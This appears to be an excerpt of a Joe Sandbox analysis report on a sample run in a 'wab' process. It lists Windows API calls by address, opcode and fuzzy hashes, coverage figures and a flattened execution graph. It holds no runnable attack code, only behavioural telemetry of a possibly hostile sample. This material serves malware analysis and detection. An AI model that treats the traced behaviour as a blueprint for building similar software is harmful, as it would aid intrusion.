                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2678498856-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Item
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3888421826-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3727323765-0
                                                                                                                                                                                                                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4284152360-0
                                                                                                                                                                                                                    • Opcode ID: a2ae8ec016122b8f6e3efdb0c2476e7f426d1c5b61e32c0c73e3f87cc7c6b3a1
                                                                                                                                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2ae8ec016122b8f6e3efdb0c2476e7f426d1c5b61e32c0c73e3f87cc7c6b3a1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 764393265-0
                                                                                                                                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 979780441-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004134E0
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004134F2
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1386444988-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                    • String ID: d=E
                                                                                                                                                                                                                    • API String ID: 909852535-3703654223
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                    • String ID: URL
                                                                                                                                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintf
                                                                                                                                                                                                                    • String ID: %%-%d.%ds
                                                                                                                                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                                                    • String ID: F^@
                                                                                                                                                                                                                    • API String ID: 568519121-3652327722
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PlacementWindowmemset
                                                                                                                                                                                                                    • String ID: WinPos
                                                                                                                                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                                                                    • API String ID: 383090722-1948609170
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                    • API String ID: 2773794195-880857682
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00408B79
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 231171946-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1961120804-0
                                                                                                                                                                                                                    • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:2.6%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:20.4%
                                                                                                                                                                                                                    Signature Coverage:0.5%
                                                                                                                                                                                                                    Total number of Nodes:845
                                                                                                                                                                                                                    Total number of Limit Nodes:17
33821->33829 33823 407c87 9 API calls 33823->33829 33824 4437bb 33850 407d1f 33824->33850 33828 407d1f FindClose 33830 4437d1 33828->33830 33829->33823 33829->33824 33831 4436ff 65 API calls 33829->33831 33854 407bf1 strcmp strcmp 33829->33854 33830->33680 33831->33829 33833 407d1f FindClose 33832->33833 33834 407c39 33833->33834 33835 406ca4 2 API calls 33834->33835 33836 407c4c strlen strlen 33835->33836 33837 407c70 33836->33837 33838 407c79 33836->33838 33855 406e81 strlen _mbscat _mbscpy _mbscat 33837->33855 33838->33818 33841 407c92 FindFirstFileA 33840->33841 33842 407cb3 FindNextFileA 33840->33842 33845 407cce 33841->33845 33843 407cd5 strlen strlen 33842->33843 33844 407cc9 33842->33844 33847 407d0e 33843->33847 33848 407d05 33843->33848 33846 407d1f FindClose 33844->33846 33845->33843 33845->33847 33846->33845 33847->33818 33856 406e81 strlen _mbscat _mbscpy _mbscat 33848->33856 33851 407d32 33850->33851 33852 407d28 FindClose 33850->33852 33851->33828 33852->33851 33853->33818 33854->33829 33855->33838 33856->33847 33857->33284 33858->33279 33859->33290 33860->33291 33861->33297 33862->33294 33863->33289 34033 426928 CloseHandle memset memset 34191 405f2b 12 API calls 34193 42df2e 127 API calls 32967 410531 32970 410344 32967->32970 32971 410351 32970->32971 32972 410398 memset GetPrivateProfileStringA 32971->32972 32973 41035f memset 32971->32973 32978 4073d5 strlen 32972->32978 32983 40735c sprintf memcpy 32973->32983 32976 410381 WritePrivateProfileStringA 32977 4103da 32976->32977 32979 4073e9 32978->32979 32981 4073eb 32978->32981 32979->32977 32980 407432 32980->32977 32981->32980 32984 40710b strtoul 32981->32984 32983->32976 32984->32981 34194 43f332 133 API calls 34196 418f35 61 API calls 34198 425e13 109 API calls 34040 411136 InterlockedCompareExchange RtlInitializeCriticalSection 34042 425e13 19 API calls 34046 440132 34 API calls 34048 4111c1 RtlInitializeCriticalSection memset 34203 4157c8 16 API calls 34205 43f3ce 138 API calls 34051 
